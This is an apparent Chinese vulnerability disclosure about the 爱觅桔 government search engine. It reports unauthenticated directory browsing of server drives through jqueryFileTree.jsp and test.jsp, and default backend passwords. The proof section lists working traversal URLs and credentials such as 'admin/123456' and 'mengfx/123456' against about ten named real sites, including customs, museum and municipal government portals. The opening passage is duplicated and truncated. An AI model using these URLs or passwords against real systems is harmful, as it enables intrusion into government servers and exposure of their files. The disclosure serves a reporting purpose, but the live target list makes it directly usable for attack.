### 简要描述: 某政务智能搜索引擎第三方组件漏洞导致任意盘符目录浏览+后台默认口令; ### 详细说明: ``` 爱觅桔智能搜索引擎是中科汇联自主研发的“提供知识的搜索引擎”,首创知识图谱关联、百姓体匹配、智能引导、自定义框计算等特色搜索服务功能,采用语义理解技术、机器学习技术,实现智能搜索、文档搜索、多媒体搜索功能。 ``` 漏洞一:第三方组件调用未进行授权访问 网站调用了jquery 显示本地文件的插件 jQuery File Tree: 文件分别为 jquery.js (jquery核心库) jqueryFileTree.js (jqueryFileTree核心库) jqueryFileTree.jsp (用于JavaScript和jsp的连接,添加列表元素等操作) jqueryFileTree.css ``` http://114.251.1.141:8080/dig/codebase/jqueryFileTree.jsp?dir=d:/ (查看源文件) http://114.251.1.141:8080/dig/pages/crawl/test.jsp?r=d:/ ``` [<img src="https://images.seebug.org/upload/201408/061323139828a58ba87b39e62849e34e5e64b4e4.png" alt="test.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/061323139828a58ba87b39e62849e34e5e64b4e4.png) 漏洞一:后台存在默认口令 admin 123456 mengfx 123456 liuzp 123456 登陆地址: ``` http://www.xxx.cn/dig/login.jsp ``` [<img src="https://images.seebug.org/upload/201408/0613332755ce018a61b0120599d8c759307c5158.png" alt="test1.png" width="600"...
### 简要描述: 某政务智能搜索引擎第三方组件漏洞导致任意盘符目录浏览+后台默认口令; ### 详细说明: ``` 爱觅桔智能搜索引擎是中科汇联自主研发的“提供知识的搜索引擎”,首创知识图谱关联、百姓体匹配、智能引导、自定义框计算等特色搜索服务功能,采用语义理解技术、机器学习技术,实现智能搜索、文档搜索、多媒体搜索功能。 ``` 漏洞一:第三方组件调用未进行授权访问 网站调用了jquery 显示本地文件的插件 jQuery File Tree: 文件分别为 jquery.js (jquery核心库) jqueryFileTree.js (jqueryFileTree核心库) jqueryFileTree.jsp (用于JavaScript和jsp的连接,添加列表元素等操作) jqueryFileTree.css ``` http://114.251.1.141:8080/dig/codebase/jqueryFileTree.jsp?dir=d:/ (查看源文件) http://114.251.1.141:8080/dig/pages/crawl/test.jsp?r=d:/ ``` [<img src="https://images.seebug.org/upload/201408/061323139828a58ba87b39e62849e34e5e64b4e4.png" alt="test.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/061323139828a58ba87b39e62849e34e5e64b4e4.png) 漏洞一:后台存在默认口令 admin 123456 mengfx 123456 liuzp 123456 登陆地址: ``` http://www.xxx.cn/dig/login.jsp ``` [<img src="https://images.seebug.org/upload/201408/0613332755ce018a61b0120599d8c759307c5158.png" alt="test1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/0613332755ce018a61b0120599d8c759307c5158.png) [<img src="https://images.seebug.org/upload/201408/06133412f61f14875986c8d4266aba48f5ae7c7a.png" alt="test2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/06133412f61f14875986c8d4266aba48f5ae7c7a.png) ### 漏洞证明: ``` 海关总署 (弱口令 mengfx 123456) http://search.customs.gov.cn/dig/pages/crawl/test.jsp?r=D%3A%5C 深圳南山GOV在线 http://www.szns.gov.cn/dig/pages/crawl/test.jsp?r=/ 上海青浦GOV http://search.shqp.gov.cn/dig/pages/crawl/test.jsp?r=/ 国家博物馆(弱口令admin 123456) http://114.255.205.162/dig/login.jsp 莆田出入境检验检疫局(弱口令 mengfx 123456) http://www.fjciq.gov.cn/dig/login.jsp 河北GOV在线(弱口令 mengfx 123456) http://218.12.44.18/dig/login.jsp 中华保险 (弱口令admin 123456) http://114.251.1.141:8080/dig/pages/crawl/test.jsp?r=D:/ 北京国土资源局 http://search.bjgtj.gov.cn/dig/login.jsp (弱口令admin 123456) 深圳光明GOV http://www.szgm.gov.cn/dig/login.jsp 弱口令admin 123456 天阳集团 http://www.tansun.com.cn/dig/login.jsp 弱口令admin 123456 ```